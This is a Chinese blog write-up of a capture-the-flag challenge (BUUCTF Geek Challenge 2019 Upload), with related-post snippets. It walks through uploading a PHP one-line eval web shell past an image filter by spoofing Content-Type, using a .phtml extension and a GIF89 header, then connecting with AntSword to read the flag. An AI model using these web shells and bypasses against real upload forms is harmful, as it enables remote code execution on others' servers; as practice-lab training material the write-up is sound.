BUUCTF [web专项13][极客大挑战 2019]Upload

已于 2023-11-03 08:58:44 修改
阅读量138 收藏 2
点赞数
文章标签: web安全 网络安全
于 2023-11-02 15:41:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanglinchiji/article/details/134183513
版权

进入后发现需要上传图片

先上传个一句话木马试试能不能上传   

 <?php @eval($_POST['pass']);?>

发现提交后,出现不是图片的错误

老规矩,抓包修改类型为图片类型看看能不能绕过

说是不能是php,估计是看了后缀名,将文件的后缀修改成.phtml试试

估计php的一句话木马不行了,到这里脑子就烧了,开始网上冲浪

参考:[极客大挑战 2019]Upload 1_极客大挑战2019upload1_坤舆小菜鸡的博客-CSDN博客一句话木马绕过-CSDN博客


修改一下一句话木马

<script language='php'>eval($_POST['pass']);</script>

上传后,发现还有错误

估计是有内容的检测,大佬说在文件头中加入GIF89,尝试绕过图片检测

发现终于上传成功

但是不知道上传到了哪里

大佬说一般默认就是upload目录,有些可以在源代码中看到上传地址

源码发现没有线索,进入/upload/1.phtml

发现了GIF89,即自己的上传文件,可以用蚁剑连一下

 注意:连接密码是你上传的一句话密码里包含的,如果不是按照我的一句话代码的话,需要自行更改连接密码

好了,成功连接到网站了

flag还是在根目录下

获得flag

flag{667c4bb4-ec49-4eb2-8976-f44203286159}
 

yanglin_371
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?的库之 jQuery UI【】7、常?的库之 jQuery Mobile【】8、常用的库之...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会做了为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
BUUCTF-WEB-[极客挑战 2019]Upload
r1727337824的博客
09-06 515
BUUCTF-WEB-[极客挑战 2019]Upload
Buuctf极客挑战2019upload
m0_64444909的博客
04-07 5150
文章目录一.划重点的知识点二.解步骤二、使用步骤1.引入库2.读入数据总结 一.划重点的知识点 GIF89a图片头文件欺骗: 一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片 GIF89a <head> <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" /> </head> 当单独查看此文件时,会出现G
BUUCTF——[极客挑战 2019]Upload 1
热门推荐
weixin_45864041的博客
09-26 1万+
文件上传漏洞,我们先写一句话木马,试着上传。 我们用shell.phtml的文件名直接上传,可以看到有一个前端检查,对文件后缀进行检查。接下来,我们将文件名改成shell.jpg进行上传。 然后又上传失败了,应该是在后端也对我们的文件内容进行了检测。接下来我们试着用文件幻术头的方式进行绕过。 在这里我试了jpg的文件头,但是还是失败了(也不知道为啥) 。最后用gif的文件头成功上传。 说明我们成功绕过了检测然后,我们重新上传,进行抓包,将文件后缀名改成phtml。 上传成功之后,没有给我们具体的存储.
[极客挑战 2019]Upload 1
xixixihan的博客
11-25 738
做题分享
极客挑战2019(复习一下漏洞)
qq_62046696的博客
07-17 757
这种一般都是备份文件了,其实不太喜欢备份文件,扫目录太慢了,打开dirsearch进行扫目录了,其实是先尝试了一下index.php.bak发现没有,扫出来了www.zip。这道难就难在,不按套路出牌,Flaaaag里面的f14gawsl字段,里面的值时NO,真正的flag在F1nal1y表里面的password字段。2、再尝试闭合方式,账号输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合(提示记得密码填上东西)...
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 1856
目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 815
目 解过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
BUUFCTF—[极客挑战 2019]Upload 1
yy
05-12 1013
上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。
ctf集【BUUCTF WEB】[极客挑战 2019]Upload1
qq_42667028的博客
01-06 471
alert("whoami")
Web3极客日报 #12
01-08
基于Web3,Solidity,Truffle的一个完整的售卖和购买的简单Dapp demo。 如何在以太坊上构建TodoList – 教程@Riverhttps://www.dappuniversity.com/articles/blockchain-app-tutorial 基于Web3,Solidity,Truffle等...
极客学院web前端开发学习教程
05-25
包含bootstrap、html5、php、web前端开发,百度网盘地址
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 651
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 967
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
Web安全:企业如何抵御常见的网络攻击?
m0_66326520的博客
05-16 722
针对网站的攻击有多种形式,攻击者既可以是业余黑客,也会是协同作战的职业黑客团伙。最关键的一条建议,就是在创建或运营网站时不要跳过安全功能,因为跳过安全设置可能会造成严重后果。虽然不可能完全消除网站攻击风险,但你至少可以缓解遭攻击的可能性和攻击后果的严重性。遭受攻击后,不仅需要及时的响应处置还需要避免同类事件的发生,因此事后的复盘分析尤为重要,做好安全防护才是最高效的网络攻击解决方案。
网络安全Linux 应急响应-溯源-系统日志排查知识点
最新发布
weixin_43822401的博客
05-17 347
编辑或;
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值